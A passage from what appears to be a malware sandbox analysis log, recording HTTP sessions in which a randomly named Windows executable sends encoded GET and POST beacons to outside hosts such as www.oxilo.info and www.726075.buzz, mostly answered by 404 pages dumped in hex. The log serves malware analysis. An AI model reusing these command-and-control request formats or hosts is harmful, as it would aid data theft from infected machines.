37 6f 38 41 78 4b 4b 31 6b 53 6a 2f 76 4d 2b 31 32 62 44 41 6d 78 36 76 39 6f 49 31 64 62 6c 64 7a 43 46 57 70 30 70 38 73 34 70 61 35 33 6e 49 79 49 68 41 47 6a 4d 6b 69 63 71 6c 4c 4b 58 33 72 6a 49 50 30 6b 49 66 52 41 54 46 33 50 67 32 37 74 69 66 2f 48 47 35 55 33 33 6e 72 42 76 6b 6d 74 6f 72 4f 34 4a 34 [TRUNCATED] Data Ascii: K29=2uGbnGLNaKaPQK3eKxGDg9C8Lbgr8n2aoKj/FWMgnLiYnnCh6UFalV0EIBZhBHe4N6gKqHSuV5r0dyv56yFJIRmvSG2k0RM6/TSVq1MsYvMob/I1P0QXOSCmt8NMP23WlNj1F+9MVGk6/mPa6RXkUut6zpluQg0sc/HBSr5JnQJKvv+YOLejBl3jVLQb9nGluHC0se8k0k015OBLcQ+FrvzoDif8YS3NXqYh5C7o8AxKK1kSj/vM+12bDAmx6v9oI1dbldzCFWp0p8s4pa53nIyIhAGjMkicqlLKX3rjIP0kIfRATF3Pg27tif/HG5U33nrBvkmtorO4J4Bfrr8GthEq6xDZxDRPD60VRUGYo/4agsiSmF4jnX741tdDeI0y/wSxFI4qRrbMceizOYc5tPx4Q0SWOi81nOCGYUDYWeblx5r2HXG7YwxHYfJCP+Sp/Re3ZzHuR1HP8E3YscR9HOWuS9cRRw8fbe5PzVblr7uZzEAIZSW0KT3KWzCMUDsAkNz5DPn6UXOqetnE1ptQIv36LIOK0B3CmEWJ0qbZPiyjeGOHW9O4iY6rib8lMgcJf+xif30qtKOFCgoKVnivj6coVDrBkqJcXAfEnV1fEVVihLMtEIA0nrALMHx7bRb091AXrdmc9RBIm4WnRiK6pv9BGs7RrIIcnYn7fqncEy6iBr1jFNVKblWHqNPcWki+dm68LqwOL/gPs3QcHRnVN5GX+dZjJ9HcWr5vMqYdBsqeFqhzitmRC2H1kHNhaYgy+zf/HM8jqYdVO6VcZrwJ8Q+9EixunmBZCyziBRrA+US0JhRmAmTMv2cnMyCFfjEE+bBAXEACR90/1R0i6ZIxJJ+oemjfSL2DDH6r6Xrabrqi2K8GPH96xt/daECWhHggXy7I/N6GLtpqnUfMqjpwygc+CsaXTkkq1L26F1To1ix0FeW5OOmROuiDnt6ORPy9r3poiq5ELIpXfaYwRiho9DxMdzaUbCWLZPRIgfeJ1JnAk0Ti [TRUNCATED]
Oct 15, 2024 16:21:05.612040997 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:21:05 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	53138	47.57.185.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:07.132059097 CEST	508	OUT	GET /nuiv/?K29=7su7kyuPS/KHUrSSGVu7suWxHYkjtEW9rejMc2pMopiQn27w9XMUnUBYAhg6Q3mcdodvpFC3LruuFA+cjx07DQKRX2SozR9AvDHFrDouFcoiTaEhBB80Fgqmq/5kDH7ol5SPL+Q=&ahL=jjndrjuPIn2hz HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:21:08.124227047 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:21:07 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	53139	162.0.213.94	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:22.222727060 CEST	757	OUT	POST /ve3g/ HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.oxilo.info Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.oxilo.info/ve3g/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 44 52 30 75 73 4b 77 41 63 30 33 47 35 74 76 72 4e 46 76 70 53 51 32 64 69 30 49 6c 67 42 62 78 41 47 49 56 4d 57 38 45 77 68 4c 71 6b 2f 6f 47 7a 48 71 34 69 74 48 61 75 4b 51 73 4c 55 35 75 42 55 79 47 47 6f 78 55 43 53 37 33 5a 41 72 48 6b 31 4a 64 61 47 38 36 6b 35 7a 59 57 31 78 79 5a 75 55 39 2b 70 4f 6f 4b 43 44 36 30 74 4b 58 4b 39 55 41 6c 4c 51 78 46 45 5a 4c 46 38 4a 75 52 74 6a 58 49 66 4c 72 47 6d 32 37 57 5a 44 58 64 61 38 4c 6a 55 65 48 46 48 49 44 6e 57 2b 53 6b 52 46 30 62 38 46 2f 2f 73 68 4b 77 41 54 49 31 51 76 4e 70 71 5a 62 79 4b 35 43 2f 55 66 65 78 67 4e 39 75 74 4d 70 42 72 43 6b Data Ascii: K29=DR0usKwAc03G5tvrNFvpSQ2di0IlgBbxAGIVMW8EwhLqk/oGzHq4itHauKQsLU5uBUyGGoxUCS73ZArHk1JdaG86k5zYW1xyZuU9+pOoKCD60tKXK9UAlLQxFEZLF8JuRtjXIfLrGm27WZDXda8LjUeHFHIDnW+SkRF0b8F//shKwATI1QvNpqZbyK5C/UfexgN9utMpBrCk
Oct 15, 2024 16:21:22.905992031 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Oct 2024 14:21:22 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 15, 2024 16:21:22.906186104 CEST	1236	IN	Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
Oct 15, 2024 16:21:22.906193972 CEST	1236	IN	Data Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
Oct 15, 2024 16:21:22.907147884 CEST	1236	IN	Data Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
Oct 15, 2024 16:21:22.907155037 CEST	1236	IN	Data Raw: 20 2d 32 2e 35 30 30 31 34 39 2c 31 34 2e 33 33 33 34 33 20 2d 30 2e 31 36 36 37 35 39 2c 34 2e 35 30 30 36 32 20 30 2e 33 33 33 31 32 34 2c 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c Data Ascii: -2.500149,14.33343 -0.166759,4.50062 0.333124,8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323"
Oct 15, 2024 16:21:22.908116102 CEST	1236	IN	Data Raw: 2c 31 30 2e 39 31 33 38 34 20 30 2e 37 36 35 34 32 2c 33 2e 31 36 34 31 20 31 2e 34 30 31 32 39 2c 36 2e 35 30 32 34 32 20 31 2e 36 39 37 38 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 Data Ascii: ,10.91384 0.76542,3.1641 1.40129,6.50242 1.69781,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Oct 15, 2024 16:21:22.908121109 CEST	1236	IN	Data Raw: 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f Data Ascii: "display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.
Oct 15, 2024 16:21:22.909281969 CEST	1236	IN	Data Raw: 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34 33 37 34 37 20 2d 39 2e 36 31 34 34 31 34 2c 31 39 2e 37 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c Data Ascii: 9657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387"
Oct 15, 2024 16:21:22.909293890 CEST	1236	IN	Data Raw: 35 34 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 Data Ascii: 54px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:no
Oct 15, 2024 16:21:22.910273075 CEST	1236	IN	Data Raw: 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 Data Ascii: id="path4565" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="transla
Oct 15, 2024 16:21:22.911173105 CEST	1236	IN	Data Raw: 2e 32 38 31 39 37 20 30 2e 32 38 34 38 34 2c 33 2e 39 36 33 35 31 20 30 2e 37 31 34 34 39 2c 30 2e 36 38 31 35 35 20 32 2e 33 35 33 39 36 2c 30 2e 33 39 39 39 39 20 33 2e 39 39 34 31 38 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: .28197 0.28484,3.96351 0.71449,0.68155 2.35396,0.39999 3.99418,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="transl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	53140	162.0.213.94	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:24.768769979 CEST	781	OUT	POST /ve3g/ HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.oxilo.info Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.oxilo.info/ve3g/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 44 52 30 75 73 4b 77 41 63 30 33 47 34 4e 66 72 50 6d 48 70 61 51 32 43 76 6b 49 6c 71 68 62 71 41 47 45 56 4d 53 6b 55 78 54 76 71 6b 66 34 47 79 47 71 34 33 74 48 61 68 71 52 6f 57 6b 34 69 42 55 32 30 47 73 31 55 43 57 54 33 5a 42 62 48 78 56 31 53 62 57 38 34 6f 5a 7a 61 49 46 78 79 5a 75 55 39 2b 70 61 43 4b 43 72 36 31 65 43 58 59 4d 55 42 35 37 51 32 45 45 5a 4c 50 73 4a 79 52 74 69 79 49 65 58 4e 47 6b 2b 37 57 59 54 58 54 76 51 4b 70 55 65 64 4c 6e 4a 47 33 30 76 4d 38 7a 51 6c 51 2f 42 4e 38 2b 4e 42 78 32 53 53 70 6a 76 75 37 36 35 5a 79 49 68 77 2f 30 66 30 7a 67 31 39 38 36 41 4f 4f 66 6e 48 79 63 73 6a 2f 6a 57 55 6c 6f 49 55 7a 53 71 33 6c 48 35 53 50 77 3d 3d Data Ascii: K29=DR0usKwAc03G4NfrPmHpaQ2CvkIlqhbqAGEVMSkUxTvqkf4GyGq43tHahqRoWk4iBU20Gs1UCWT3ZBbHxV1SbW84oZzaIFxyZuU9+paCKCr61eCXYMUB57Q2EEZLPsJyRtiyIeXNGk+7WYTXTvQKpUedLnJG30vM8zQlQ/BN8+NBx2SSpjvu765ZyIhw/0f0zg1986AOOfnHycsj/jWUloIUzSq3lH5SPw==
Oct 15, 2024 16:21:25.431929111 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Oct 2024 14:21:25 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 15, 2024 16:21:25.432086945 CEST	1236	IN	Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
Oct 15, 2024 16:21:25.432094097 CEST	1236	IN	Data Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
Oct 15, 2024 16:21:25.433010101 CEST	1236	IN	Data Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
Oct 15, 2024 16:21:25.433017015 CEST	848	IN	Data Raw: 20 2d 32 2e 35 30 30 31 34 39 2c 31 34 2e 33 33 33 34 33 20 2d 30 2e 31 36 36 37 35 39 2c 34 2e 35 30 30 36 32 20 30 2e 33 33 33 31 32 34 2c 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c Data Ascii: -2.500149,14.33343 -0.166759,4.50062 0.333124,8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323"
Oct 15, 2024 16:21:25.433779001 CEST	1236	IN	Data Raw: 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f Data Ascii: inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16
Oct 15, 2024 16:21:25.433785915 CEST	1236	IN	Data Raw: 20 63 20 32 2e 39 31 36 36 33 37 2c 31 30 2e 34 32 39 33 37 20 35 2e 38 33 33 34 35 38 2c 32 30 2e 38 35 39 34 20 37 2e 32 39 31 39 36 34 2c 32 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c Data Ascii: c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.
Oct 15, 2024 16:21:25.434830904 CEST	1236	IN	Data Raw: 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 Data Ascii: 5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stro
Oct 15, 2024 16:21:25.434838057 CEST	1236	IN	Data Raw: 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 Data Ascii: 5,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198
Oct 15, 2024 16:21:25.435772896 CEST	848	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e Data Ascii: style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform="translat
Oct 15, 2024 16:21:25.437261105 CEST	1236	IN	Data Raw: 38 31 20 31 30 2e 35 30 36 30 39 2c 2d 31 35 2e 31 35 36 31 32 20 38 2e 30 35 35 34 35 2c 2d 33 2e 37 37 39 36 35 20 36 2e 36 31 37 30 32 2c 2d 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 Data Ascii: 81 10.50609,-15.15612 8.05545,-3.77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opaci

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	53141	162.0.213.94	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
